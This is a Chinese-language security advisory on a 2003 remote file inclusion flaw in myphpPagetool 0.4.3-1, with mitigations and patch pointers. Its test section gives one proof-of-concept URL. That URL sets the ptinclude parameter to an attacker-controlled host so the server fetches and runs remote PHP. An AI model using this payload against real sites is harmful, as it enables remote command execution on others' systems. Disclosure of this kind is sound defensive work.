首页 -> 安全研究

安全研究

安全漏洞
myphpPageTool远程文件包含漏洞

发布日期:2003-02-03
更新日期:2003-02-08

受影响系统:
Sebastian Bunka myphpPagetool 0.4.3-1
描述:
BUGTRAQ  ID: 6744

myphpPagetool是一款管理WEB站点的工具,可以方便增加页面。

myphpPagetool包含的多个PHP脚本没有正确处理用户提交的URI请求,远程攻击者可以利用这个漏洞包含远程服务器上的文件,以WEB进程权限在系统上执行任意命令。

myphpPagetool中的/doc/admin包含多个PHP脚本文件,如index.php、help1.php、help2.php、help3.php、help4.php、help5.php、help6.php、help7.php、help8.php和help9.php,这些文件包含如下代码:

----------------------------------------
<?php
include ($ptinclude . "/pt_config.inc");
[...]
----------------------------------------

由于$ptinclude变量之前没有任何定义,攻击者可以定义此变量为远程服务器上的任意文件,如果指定的文件包含恶意PHP代码,就可以导致以WEB进程权限在系统上执行任意命令。

<*来源:Frog Man (leseulfrog@hotmail.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=104428689506537&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://[target]/doc/admin/index.php?ptinclude=http://[attacker]
with :
http://[attacker]/pt_config.inc

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 修改php.ini配置文件中的选项,设置registers_global = OFF。

* "Frog Man" <leseulfrog@hotmail.com>提供了第三方补丁程序:

http://www.phpsecure.org

厂商补丁:

Sebastian Bunka
---------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://myphppagetool.sourceforge.net/index.php?mygoog=Homepage

浏览次数:2916
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障